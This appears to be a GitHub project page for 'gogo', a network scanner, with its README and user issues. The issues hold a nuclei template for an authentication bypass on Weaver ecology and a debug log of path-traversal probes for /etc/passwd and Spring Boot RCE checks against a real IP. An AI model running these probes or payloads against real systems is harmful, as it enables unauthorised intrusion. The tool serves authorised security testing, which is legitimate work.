Git Product home page Git Product logo

gogo's Introduction

gogo

Features

  • 自由的端口配置
  • 支持主动/被动指纹识别
  • 关键信息提取, 如title, cert 以及自定义提取信息的正则
  • 支持nuclei poc, poc目录: https://chainreactors.github.io/wiki/gogo/detail/#_6
  • 无害的扫描, 每个添加的poc都经过人工审核
  • 可控的启发式扫描
  • 超强的性能, 最快的速度, 尽可能小的内存与CPU占用.
  • 最小发包原则, 尽可能少地发包获取最多的信息
  • 支持DSL, 可以通过简单的配置自定义自己的gogo
  • 完善的输出与输出设计
  • 几乎不依赖第三方库, 纯原生go编写, 在windows 2003上也可以使用完整的漏洞/指纹识别功能

QuickStart

完整的文档与教程位于wiki: https://chainreactors.github.io/wiki/gogo/

指纹与poc仓库: https://github.com/chainreactors/gogo-templates

最简使用

指定网段进行默认扫描, 并在命令行输出

gogo -i 192.168.1.1/24 -p win,db,top2

端口配置

一些常用的端口配置:

  • -p - 等于-p 1-65535
  • -p 1-1000 端口范围
  • -p common tag: common 表示内网常用端口
  • -p top2,top3 可以同时选择多个tag. 外网常见web端口
  • -p all 表示所有预设的tag的合集.

通过逗号分割多个配置, 可根据场景进行各种各样的组合配置. 例如:

gogo -i 1.1.1.1/24 -p 1-1000,common,http,db

查看全部端口配置

gogo -P port

可查看所有的tag对应的端口.

当前已有端口配置: (根据端口类型分类)
         top1 :  80,443,8080
         top2 :  70,80,81,82,83,84,85,86,87,88,89,90,443,1080,2000,2001,3000,3001,1443,4443,4430,5000,5001,5601,6000,6001,6002,6003,7000,7001,7002,7003,9000,9001,9002,9003,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8820,6443,8443,9443,8787,7080,8070,7070,7443,9080,9081,9082,9083,5555,6666,7777,7788,9999,6868,8888,8878,8889,7890,5678,6789,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9988,9876,8765,8099,8763,8848,8161,8060,8899,800,801,888,10000,10001,10002,10003,10004,10005,10006,10007,10008,10009,10010,1081,1082,10080,10443,18080,18000,18088,18090,19090,19091,50070
         top3 :  444,9443,6080,6443,9070,9092,9093,7003,7004,7005,7006,7007,7008,7009,7010,7011,9003,9004,9005,9006,9007,9008,9009,9010,9011,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111,8161,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8880,8881,8882,8883,8884,8885,8886,8887,8888,8889,8890,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8180,8181,8983,1311,8363,8800,8761,8873,8866,8900,8282,8999,8989,8066,8200,8040,8060,10800,18081
         docker :  2375,2376,2377,2378,2379,2380
         lotus :  1352
         dubbo :  18086,20880,20881,20882
         oracle :  1158,1521,11521,210
         ...
         ...
         ...

启发式扫描

当目标范围的子网掩码小于24时, 建议启用 smart模式扫描(原理见doc), 例如子网掩码为16时(输出结果较多, 建议开启--af输出到文件, 命令行只输出日志)

gogo -i 172.16.1.1/12 -m ss --ping -p top2,win,db --af

--af 表示自动指定文件生成的文件名.

-m ss 表示使用supersmart模式进行扫描. 还有ss,sc模式适用于不同场景

--ping 表示在指纹识别/信息获取前判断ip是否能被ping通, 减少无效发包. 需要注意的是, 不能被ping通不代表目标一定不存活, 使用时请注意到这一点

workflow

启发式扫描的命令有些复杂, 但可以使用workflow将复杂的命令写成配置文件, 快捷调用(内置的workflow细节见doc).

gogo -w 172

即可实现与gogo -i 172.16.1.1/12 -m ss --ping -p top2,win,db --af 完全相同的配置

查看所有workflow

gogo -P workflow

常用的配置已经被集成到workflow中, 例如使用supersmart mod 扫描10段内网, gogo -w 10即可.

还有一些预留配置(即填写了其他配置, 但没有填写目标, 需要-i手动指定目标), 例如:

gogo -w ss -i 11.0.0.0/8

workflow中的预设参数优先级低于命令行输入, 因此可以通过命令行覆盖workflow中的参数. 例如:

gogo -w 10 -i 11.0.0.0/8

示例

一个简单的任务

gogo -i 81.68.175.32/28 -p top2

gogo -i 81.68.175.32/28 -p top2
[*] Current goroutines: 1000, Version Level: 0,Exploit Target: none, PortSpray: false ,2022-07-07 07:07.07
[*] Start task 81.68.175.32/28 ,total ports: 100 , mod: default ,2022-07-07 07:07.07
[*] ports: 80,81,82,83,84,85,86,87,88,89,90,443,1080,2000,2001,3000,3001,4443,4430,5000,5001,5601,6000,6001,6002,6003,7000,7001,7002,7003,9000,9001,9002,9003,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,8017,8018,8019,8020,6443,8443,9443,8787,7080,8070,7070,7443,9080,9081,9082,9083,5555,6666,7777,9999,6868,8888,8889,9090,9091,8091,8099,8763,8848,8161,8060,8899,800,801,888,10000,10001,10080 ,2022-07-07 07:07.07
[*] Scan task time is about 8 seconds ,2022-07-07 07:07.07
[+] http://81.68.175.33:80      nginx/1.16.0            nginx                   bd37 [200] HTTP/1.1 200
[+] http://81.68.175.32:80      nginx/1.18.0 (Ubuntu)           nginx                   8849 [200] Welcome to nginx!
[+] http://81.68.175.34:80      nginx           宝塔||nginx                     f0fa [200] 没有找到站点
[+] http://81.68.175.34:8888    nginx           nginx                   d41d [403] HTTP/1.1 403
[+] http://81.68.175.34:3001    nginx           webpack||nginx                  4a9b [200] shop_mall
[+] http://81.68.175.37:80      Microsoft-IIS/10.0              iis10                   c80f [200] HTTP/1.1 200             c0f6 [200] 安全入口校验失败
[*] Alive sum: 5, Target sum : 1594 ,2022-07-07 07:07.07
[*] Totally run: 4.0441884s ,2022-07-07 07:07.07

如果要联动其他工具, 可以指定-q/--quiet关闭日志信息, 只保留输出结果.

输出与再处理

关于输入输出以及各种高级用法请见output的wiki

如果执行gogo -i 81.68.175.1 --af

扫描完成后, 可以看到在gogo二进制文件同目录下, 生成了.81.68.175.1_28_all_default_json.dat1, 该文件是deflate压缩的json文件.

通过gogo格式化该文件, 获得human-like的结果

 gogo  -F .\.81.68.175.1_28_all_default_json.dat1
Scan Target: 81.68.175.1/28, Ports: all, Mod: default
Exploit: none, Version level: 0

[+] 81.68.175.32
        http://81.68.175.32:80  nginx/1.18.0 (Ubuntu)           nginx                   8849 [200] Welcome to nginx!
        tcp://81.68.175.32:22                   *ssh                     [tcp]
        tcp://81.68.175.32:389                                           [tcp]
[+] 81.68.175.33
        tcp://81.68.175.33:3306                 *mysql                   [tcp]
        tcp://81.68.175.33:22                   *ssh                     [tcp]
        http://81.68.175.33:80  nginx/1.16.0            nginx                   bd37 [200] HTTP/1.1 200
[+] 81.68.175.34
        tcp://81.68.175.34:3306                 mysql 5.6.50-log                         [tcp]
        tcp://81.68.175.34:21                   ftp                      [tcp]
        tcp://81.68.175.34:22                   *ssh                     [tcp]
        http://81.68.175.34:80  nginx           宝塔||nginx                     f0fa [200] 没有找到站点
        http://81.68.175.34:8888        nginx           nginx                   d41d [403] HTTP/1.1 403
        http://81.68.175.34:3001        nginx           webpack||nginx                  4a9b [200] shop_mall
[+] 81.68.175.35
        http://81.68.175.35:47001       Microsoft-HTTPAPI/2.0           microsoft-httpapi                       e702 [404] Not Found
[+] 81.68.175.36
        http://81.68.175.36:80  nginx   PHP     nginx                   babe [200] 风闻客栈24小时发卡中心 - 风闻客栈24小时发卡中心
        tcp://81.68.175.36:22                   *ssh                     [tcp]
...
...

导出到其他工具

一些常用的输出格式.

  • -o full 默认输出格式, 即上面示例所示.
  • -o color 带颜色的full输出. 在v2.11.0版本之后, -F 输出到命令行时为默认开启状态. 如果需要关闭, 手动指定-o full即可
  • -o jl 一行一个json, 可以通过管道传给jq实时处理
  • -o json 一个大的json文件
  • -o url 只输出url, 通常在-F时使用

所有的输出格式见: https://chainreactors.github.io/wiki/gogo/start/#_4

输出过滤器

--filter 参数可以从dat文件中过滤出指定的数据并输出.

例如过滤指定字段的值: gogo -F 1.dat --filter framework::redis -o target 表示从1.dat中过滤出redis的目标, 并输出为target字段.

其中:: 表示模糊匹配, 还有其他三种语法,如 == 为精准匹配, != 为不等于, !: 为不包含

-F 1.json -f file 重新输出到文件, 也可以-F 1.dat --af 自动生成格式化后的文件名.

注意事项

  • (重要)因为并发过高,可能对路由交换设备造成伤害, 例如某些家用路由设备面对高并发可能会死机, 重启, 过热等后果. 因此在外网扫描的场景下建议在阿里云,华为云等vps上使用,如果扫描国外资产,建议在国外vps上使用.本地使用如果网络设备性能不佳会带来大量丢包. 如果在内网扫描需要根据实际情况调整并发数.
  • 如果使用中发现疯狂报错,大概率是io问题(例如多次扫描后io没有被正确释放,或者配合proxifier以及类似代理工具使用报错),可以通过重启电脑,或者虚拟机中使用,关闭代理工具解决.如果依旧无法解决请联系我们.
  • 还需要注意,upx压缩后的版本虽然体积小,但是有可能被杀软杀,也有可能在部分机器上无法运行.
  • 一般情况下无法在代理环境中使用,除非使用-t参数指定较低的速率(默认并发为4000).
  • gogo本身并不具备任何攻击性, 也无法对任何漏洞进行利用.
  • 使用gogo需先确保获得了授权, gogo反对一切非法的黑客行为

使用场景并发推荐

默认的并发linux为4000, windows为1000, 为企业级网络环境下可用的并发. 不然弱网络环境(家庭, 基站等)可能会导致网络dos

建议根据不同环境,手动使用-t参数指定并发数.

  • 家用路由器(例如钓鱼, 物理, 本机扫描)时, 建议并发 100-500
  • linux 生产网网络环境(例如外网突破web获取的点), 默认并发4000, 不需要手动修改
  • windows 生产网网络环境, 默认并发1000, 不需要手动修改
  • 高并发下udp协议漏报较多, 例如获取netbois信息时, 建议单独对udp协议以较低并发重新探测
  • web的正向代理(例如regeorg),建议并发 10-30
  • 反向代理(例如frp), 建议并发10-100

如果如果发生大量漏报的情况, 大概率是网络环境发生的阻塞, 倒是网络延迟上升超过上限.

因此也可以通过指定 -d 5 (tcp默认为2s, tls默认为两倍tcp超时时间,即4s)来提高超时时间, 减少漏报.

未来也许会实现auto-tune, 自动调整并发速率

这些用法大概只覆盖了一小半的使用场景, 请阅读文档

Make

手动编译

# download
git clone --recurse-submodules https://github.com/chainreactors/gogo
cd gogo/v2

# sync dependency
go mod tidy   

# generate template.go
# 注意: 如果需要使用go1.10编译windows03可用版本, 也需要先使用高版本的go generate生成相关依赖
go generate  

# build 
go build .

# windows server 2003 compile
GOOS=windows GOARCH=386 go1.10 build .

# 因为go1.10 还没有go mod, 可能会导致依赖报错. 如果发生了依赖报错, 可以使用go1.11 编译. 
# go1.11 官方声明不支持windows server 2003 , 实测可以稳定运行(需要调低并发).
GOOS=windows GOARCH=386 go1.11 build .

如果需要编译windows xp/2003的版本, 请先使用高版本的go生成templates. 再使用go 1.11编译即可.

Similar or related works

  • ServerScan 早期的简易扫描器, 功能简单但开拓了思路
  • fscan 简单粗暴的扫描器, 细节上有不少问题, 但胜在简单. 参考其直白的命令行,设计了workflow相关功能.
  • kscan 功能全面的扫描器, 从中选取合并了部分指纹
  • ladongo 集成了各种常用功能, 从中学习了多个特殊端口的信息收集
  • cube 与fscan类似, 从中学习了NTLM相关协议的信息收集

gogo从这些相似的工作中改进自身. 感谢前人的工作.

细节上的对比请看文档

THANKS

gogo's People

Contributors

m09ic avatar passingfoam avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

hezs87 shimxx chlitsec jaky5155 luoooio shenghuo2 qsdj sec-fork istoliving du1ge startagain2016 dk47os3r xinghuoliaoyuanbaby evil7en9 mabangde jeningogo atlassion huoxi-any rixoye harry1080 nearlee2008 yangshuangfu hackdou li6lac orleven wha000tif 1337g a16ztt qqqqtest123 york-cmd topman940720 nidemingzizj vlltomford-0 ktessi xiju2003 om1jerry northshad0w eniac888 afwu hackerxj007 opensesamedoors iq-scm amzza0x00 eleveni386 sec-fork mxm-tools old10vely geekby showsmall jsanoob no-github nanaao zha0cai ashupup ha1c9on xiumulty wuha0926 langlyyy ipadroid zhangliu202 th31nk jackypeng66 wdnmdgdx741 leoggmagic empty2081 iiiusky lubyruffy arrnitage 360sec dbb-pro acodervic babelqwerty just4lee grow520 gnusec pyking ful1moon github-user-6 wsppt changheluor007 phuong39 bowman03 hosinozola nullbyte000 tghook h1d3r superoldman96 zha0 evasilence cxx-2233 xzone911 dedemomo0 tomtom18-eng goodwozou msr00t haiandaxia alinroscaneanu mzcifer kk-hub446 4nonymous1024

gogo's Issues

匹配IP不完善 

sudo ./gogo -i 172.16.0.0-253
[warn] System fd limit: 2560 , Please exec 'ulimit -n 65535' 
[warn] Now set threads to 2460 
[warn] Parse Ip Failed, skipped, Unable to resolve domain name:172.16.0.0-253. SKIPPED! 
[-] all targets format error

或者

sudo ./gogo -i 172.16.0.0-172.31.254.254                            
[warn] System fd limit: 2560 , Please exec 'ulimit -n 65535' 
[warn] Now set threads to 2460 
[warn] Parse Ip Failed, skipped, Unable to resolve domain name:172.16.0.0-172.31.254.254. SKIPPED! 
[-] all targets format error

提个小建议,可以直接用Fscan的那一套匹配IP的方法 ❤️

ip 输入功能

希望能增加类似于 192.168.35.25-35 这样的输入功能

考虑增加基于mssql和winrm的ntlm探测吗

毕竟有时候wmi和smb不一定开。
mssql:

package plugin

import (
	"bytes"
	"github.com/M09ic/go-ntlmssp"
	. "github.com/chainreactors/gogo/v2/pkg"
	"github.com/chainreactors/utils/iutils"
)


func mssqlScan(result *Result) {
	result.Port = "1433"
	target := result.GetTarget()
	conn, err := NewSocket("tcp", target, RunOpt.Delay)
	if err != nil {
		return
	}
	_, err = conn.Request(prelogin, 4096)

	if err != nil {
		return
	}

	r2, err := conn.Request(SSPI_Message, 4096)
	off_ntlm := bytes.Index(r2, []byte("NTLMSSP"))
	data := r2[off_ntlm:]
	defer conn.Close()
	result.Open = true
	result.Status = "mssql"
	result.Protocol = "mssql"
	if result.Title == "" {
		result.AddNTLMInfo(iutils.ToStringMap(ntlmssp.NTLMInfo(data)), "mssql")
	}
}

var prelogin = []byte{
	0x12, 0x01, 0x00, 0x58, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x06, 0x01, 0x00, 0x25,
	0x00, 0x01, 0x02, 0x00, 0x26, 0x00, 0x01, 0x03, 0x00, 0x27, 0x00, 0x04, 0x04, 0x00, 0x2b, 0x00,
	0x01, 0x05, 0x00, 0x2c, 0x00, 0x24, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
}

var SSPI_Message = []byte{
	0x10, 0x01, 0x01, 0xb3, 0x00, 0x00, 0x01, 0x00, 0xab, 0x01, 0x00, 0x00, 0x04, 0x00, 0x00, 0x74,
	0x40, 0x1f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x2a, 0x2a, 0x2a, 0x2a, 0x00, 0x00, 0x00, 0x00,
	0xe0, 0x83, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5e, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x70, 0x00, 0x21, 0x00, 0xb2, 0x00, 0x0e, 0x00,
	0xce, 0x00, 0x04, 0x00, 0xd2, 0x00, 0x21, 0x00, 0x14, 0x01, 0x00, 0x00, 0x14, 0x01, 0x07, 0x00,
	0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x2a, 0x22, 0x01, 0x7e, 0x00, 0xa0, 0x01, 0x00, 0x00, 0xa0, 0x01,
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x00, 0x4e, 0x00, 0x4f, 0x00, 0x4e, 0x00, 0x59, 0x00,
	0x4d, 0x00, 0x4f, 0x00, 0x55, 0x00, 0x53, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x72, 0x00, 0x65, 0x00,
	0x20, 0x00, 0x2e, 0x00, 0x4e, 0x00, 0x65, 0x00, 0x74, 0x00, 0x20, 0x00, 0x53, 0x00, 0x71, 0x00,
	0x6c, 0x00, 0x43, 0x00, 0x6c, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00, 0x20, 0x00,
	0x44, 0x00, 0x61, 0x00, 0x74, 0x00, 0x61, 0x00, 0x20, 0x00, 0x50, 0x00, 0x72, 0x00, 0x6f, 0x00,
	0x76, 0x00, 0x69, 0x00, 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x31, 0x00, 0x30, 0x00, 0x2e, 0x00,
	0x32, 0x00, 0x30, 0x00, 0x30, 0x00, 0x2e, 0x00, 0x32, 0x00, 0x31, 0x00, 0x35, 0x00, 0x2e, 0x00,
	0x31, 0x00, 0x30, 0x00, 0x38, 0x00, 0xa0, 0x01, 0x00, 0x00, 0x43, 0x00, 0x6f, 0x00, 0x72, 0x00,
	0x65, 0x00, 0x20, 0x00, 0x2e, 0x00, 0x4e, 0x00, 0x65, 0x00, 0x74, 0x00, 0x20, 0x00, 0x53, 0x00,
	0x71, 0x00, 0x6c, 0x00, 0x43, 0x00, 0x6c, 0x00, 0x69, 0x00, 0x65, 0x00, 0x6e, 0x00, 0x74, 0x00,
	0x20, 0x00, 0x44, 0x00, 0x61, 0x00, 0x74, 0x00, 0x61, 0x00, 0x20, 0x00, 0x50, 0x00, 0x72, 0x00,
	0x6f, 0x00, 0x76, 0x00, 0x69, 0x00, 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x54, 0x00, 0x64, 0x00,
	0x73, 0x00, 0x54, 0x00, 0x65, 0x00, 0x73, 0x00, 0x74, 0x00, 0x60, 0x7c, 0x06, 0x06, 0x2b, 0x06,
	0x01, 0x05, 0x05, 0x02, 0xa0, 0x72, 0x30, 0x70, 0xa0, 0x30, 0x30, 0x2e, 0x06, 0x0a, 0x2b, 0x06,
	0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x82, 0xf7, 0x12,
	0x01, 0x02, 0x02, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x0a,
	0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x1e, 0xa2, 0x3c, 0x04, 0x3a, 0x4e, 0x54,
	0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x01, 0x00, 0x00, 0x00, 0xb7, 0xb2, 0x08, 0xe2, 0x09, 0x00,
	0x09, 0x00, 0x31, 0x00, 0x00, 0x00, 0x09, 0x00, 0x09, 0x00, 0x28, 0x00, 0x00, 0x00, 0x0a, 0x00,
	0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f, 0x41, 0x4e, 0x4f, 0x4e, 0x59, 0x4d, 0x4f, 0x55, 0x53, 0x57,
	0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, 0x55, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00,
	0x00, 0x00, 0xff,
}

winrm:

func winrmScan(result *Result) {
	result.Port = "5985"
	target := result.GetTarget()
	uri := fmt.Sprintf("http://%s/wsman", target)
	//fmt.Println(uri)
	clt := http.Client{Timeout: time.Duration(3) * time.Second}
	req, _ := http.NewRequest("POST", uri, nil)
	req.Header.Add("Content-Length", "0")
	req.Header.Add("Keep-Alive", "true")
	req.Header.Add("Content-Type", "application/soap+xml;charset=UTF-8")
	req.Header.Add("User-Agent", "Microsoft WinRM Client")
	req.Header.Add("Authorization", "Negotiate TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==")
	resp, err := clt.Do(req)
	if err != nil {
		result.Protocol = "tcp"
		result.Status = "tcp"
		return
	}
	defer resp.Body.Close()
	ntlminfo := resp.Header.Get("Www-Authenticate")[10:]
	//fmt.Println(ntlminfo)
	data, err := base64.StdEncoding.DecodeString(ntlminfo)
	if err != nil {
		result.Protocol = "tcp"
		result.Status = "tcp"
		return
	} else {
		result.Status = "winrm"
		result.Open = true
	}
	result.Protocol = "winrm"
	result.AddNTLMInfo(iutils.ToStringMap(ntlmssp.NTLMInfo(data)), "winrm")
}```

师傅zombie有消息吗

师傅好,目前来看,爆破口令无法避免,当然有多种方式可以解决这个问题,但是实际情况下还是希望集成ssh等口令爆破,可以由参数控制。

无法正常提取到sessionkey中间变量 

id: ecology-VerifyQuickLogin-any-user-login

info:
  name: ecology-VerifyQuickLogin-any-user-login
  severity: critical
  tags: "泛微 weaver"

requests:
  - raw:
      - |
        POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        identifier=1&language=1&ipaddress=1.1.1.1

      - |
        POST /mobile/plugin/plus/login/LoingFromEb.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        
        loginkey={{session}}

    req-condition: true
    extractors:
      - type: regex
        part: body
        group: 1
        internal: true
        name: session
        regex:
          - 'sessionkey":"(.*)"'

    matchers:
      - type: word
        part: body
        words:
          - "RedirectFile=/wui/main.jsp"

扫描任务中途停止后,输出的结果文件无法查看?

扫描c段中途停止 我想看结果 但是提示

# ./gogo -F .10.8.0.2.24_20-65535_default_jl.dat --filter title!=
[*] Task has not been completed,auto fix json , 2024-04-25 17:35.19
[*] Task has not been completed,auto fix json , 2024-04-25 17:35.19
[*] Task has not been completed,auto fix json , 2024-04-25 17:35.19
Killed

这个有解决办法吗

白名单功能未生效

--exclude参数和--exclude-file参数没有生效,命令行添加了要排除的ip,但是在扫描的时候还是扫了
./gogo_linux_amd64 --ip=172.22.1.1/16 -w snoping --exclude=172.22.235.41/24 --af
image

另外探测存活的时候子网掩码不规范,可以让显示输出的都默认为1/24这样的么,这样在白名单排除的时候可以方便弄
现在探测存活出来的网段都是172.22.216.41/24这样的,可能无法准确快速对应

疑似bug问题

我在测试期间发现的一个问题
./gogo -i x.x.x.x -p 8848 --exploit-name=nacos-default-login是有漏洞输出的
[+] http://x.x.x.126:8848 [200] Nacos [ high: nacos-default-login payloads: password:nacos username:nacos ]

但是./gogo -i x.x.x.126 -p 8848 -ev是没有漏洞输出的,换而言之只有指定了漏洞才会有输出,我暂时没有发现这是什么原因,如果需要目标ip进行测试,请与我联系

提问

windows 不进行--af 输出无颜色是否可以解决
想跟linux一样info输出蓝色字样

提议

是否可以增加类似这种的指纹规则
该条为fofa语句body="lui_login_message_td" && body="form_bottom"
我尝试在gogo中加入"lui_login_message_td"&&"form_bottom"生成时报错,或者是否有别的方法

扫描结果 -F 读取卡死

image

文件有81mb, 在服务器上完全看不了,我拖到本地后 就如上图这两行, 没有其他输出 一直卡着 是没扫到东西吗?

# ./gogo -F .192.168.19.0.24_20-65535_default_jl.dat 
Killed

是否可以支持基于URL的指纹探测和nuclei联动

师傅好,目前的gogo主要重点在内网场景中,但其实代码中对于web服务的主动和被动指纹探测以及联动nuclei进行漏洞扫描的思路和外网中的打点是类似和重合的,是否可以添加一种外网使用的场景,输入为url,然后进行主动指纹和被动指纹识别后联动nuclei进行tags扫描。

新版本使用报错

新版本使用报错

./gogo: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./gogo)
./gogo: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./gogo)

gogo-neutron解析template出错

https://github.com/chainreactors/neutron/blob/master/templates_gogo/impl.go:25和31行有bug,在循环中使用指针会导致requests中所有路径均指向最后一个路径:

e.g:使用如下poc会导致,进行两次/bbb/路径的请求

id: test
info:
  name: test
  severity: info
  tags: http

http:
  - method: GET
    path:
      - "{{BaseURL}}/aaa/"

    matchers:
      - type: word
        part: body
        words:
          - 'refresh'

  - method: GET
    path:
      - "{{BaseURL}}/bbb/"

    matchers:
      - type: word
        part: body
        words:
          - 'Found'

windows Server 2008 R2 ERROR

windows server 2008 R2 和 windwos 7 低版本都报错

Exception 0xc0000005 0x8 0x0 0x0
PC=0x0

runtime.asmstdcall()
$GOROOT/src/runtime/sys_windows_amd64.s:65 +0x75 fp=0xb2f9e0 sp=0xb2f9c0 pc=0x1591f5
rax 0x0
rbx 0x78e3c0
rcx 0x7e2460
rdi 0x7fffffdd000
rsi 0xb2fbe0
rbp 0xb2fb20
rsp 0xb2f9b8
r8 0x0
r9 0xb2fc20
r10 0x7b3f58
r11 0x21
r12 0xb2fc00
r13 0x1
r14 0x78db20
r15 0x0
rip 0x0
rflags 0x10293
cs 0x33
fs 0x53
gs 0x2b

关于 body 的 md5匹配

有些指纹得匹配body的md5, 在文件 v2/pkg/fingers/fingers.go 中匹配的是整个响应 content md5, 匹配body会好一点

for _, md5s := range r.Regexps.MD5 {
	if md5s == parsers.Md5Hash([]byte(content)) {
		logs.Log.Debugf("%s finger hit, md5: %s", r.FingerName, md5s)
		return true, false, ""
	}
}

响应里返回的 date, server 字段随机性比较高没办法匹配 md5
image

mac端使用无法生成文件

mac端使用gogo扫描完成后,强制输出文件或者自动以输出文件并无落地文件
image
使用./gogo_darwin_amd64 -i 192.168.0.1/24 --af可落地文件但是使用./gogo_darwin_amd64 -i 192.168.0.1/24 -f 1.dat无法落地
image
建议生成文件前缀别带. mac端和linux端.命名的文件自动隐藏

主动指纹识别不了

主动指纹识别不了
image
image

[] gogo:=v2.12.1 , 2024-04-24 16:43.55
[] Current goroutines: 1000, Version Level: 1,Exploit: auto, PortSpray: false , 2024-04-24 16:43.55
[] Start task 39.98.123.211 ,total ports: 1 , mod: default , 2024-04-24 16:43.55
[] ports: 8170 , 2024-04-24 16:43.55
[] Default Scan is expected to take 4 seconds , 2024-04-24 16:43.55
[debug] springboot finger hit, body: "no message available"
[debug] active detect: http://39.98.123.211:8170/info
[debug] active detect: http://39.98.123.211:8170/v2/keys/
[debug] active detect: http://39.98.123.211:8170/zabbix
[debug] active detect: http://39.98.123.211:8170/nacos/
[debug] active detect: http://39.98.123.211:8170/eosmgr/eos/EventDispatcher
[debug] active detect: http://39.98.123.211:8170/console/login/LoginForm.jsp
[debug] active detect: http://39.98.123.211:8170/ueditor
[debug] active detect: http://39.98.123.211:8170/swagger-ui.html
[debug] active detect: http://39.98.123.211:8170/druid/index.html
[debug] active detect: http://39.98.123.211:8170/functionRouter
[debug] active detect: http://39.98.123.211:8170/tmui/login.jsp
[debug] active detect: http://39.98.123.211:8170/login/img/product_logo.png
[debug] active detect: http://39.98.123.211:8170/WebReport/ReportServer
[debug] active detect: http://39.98.123.211:8170/ReportServer
[debug] active detect: http://39.98.123.211:8170/webroot/ReportServer
[debug] active detect: http://39.98.123.211:8170/solr
[debug] active detect: http://39.98.123.211:8170/axis2/services/testunknown
[debug] active detect: http://39.98.123.211:8170/OAapp
[debug] active detect: http://39.98.123.211:8170/jenkins
[debug] active detect: http://39.98.123.211:8170/xxl-job-admin
[debug] active detect: http://39.98.123.211:8170/login/login.php
[debug] active detect: http://39.98.123.211:8170/poserver.zz
[debug] active detect: http://39.98.123.211:8170/emm-api
[debug] active detect: http://39.98.123.211:8170/vision/index.jsp
[debug] active detect: http://39.98.123.211:8170/smartbi/index.jsp
[debug] active detect: http://39.98.123.211:8170/smartbi/
[debug] active detect: http://39.98.123.211:8170/ht-login.jsp
[debug] request favicon http://39.98.123.211:8170/favicon.ico 200
[debug] http://39.98.123.211:8170/favicon.ico favicon 0488faca4c19046b94d07c3ee83cf9d6 116323821
[debug] neutron scan http://39.98.123.211:8170 with springboot-h2-db-rce
[debug] request POST http://39.98.123.211:8170/actuator/env map[]
[debug] neutron scan http://39.98.123.211:8170 with springboot-h2-db-rce error:
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuators-jolokia-rce
[debug] request GET http://39.98.123.211:8170/jolokia/exec map[]
[debug] request GET http://39.98.123.211:8170/actuator/jolokia/exec map[]
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuators-jolokia-rce error:
[debug] neutron scan http://39.98.123.211:8170 with CVE-2021-21234
[debug] request GET http://39.98.123.211:8170/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ map[]
[debug] request GET http://39.98.123.211:8170/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ map[]
[debug] request GET http://39.98.123.211:8170/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ map[]
[debug] request GET http://39.98.123.211:8170/log/view?filename=/etc/passwd&base=../../../../../../../../../../ map[]
[debug] neutron scan http://39.98.123.211:8170 with CVE-2021-21234 error:
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuator
[debug] payloads: path:info
[debug] request GET http://39.98.123.211:8170/info map[path:info]
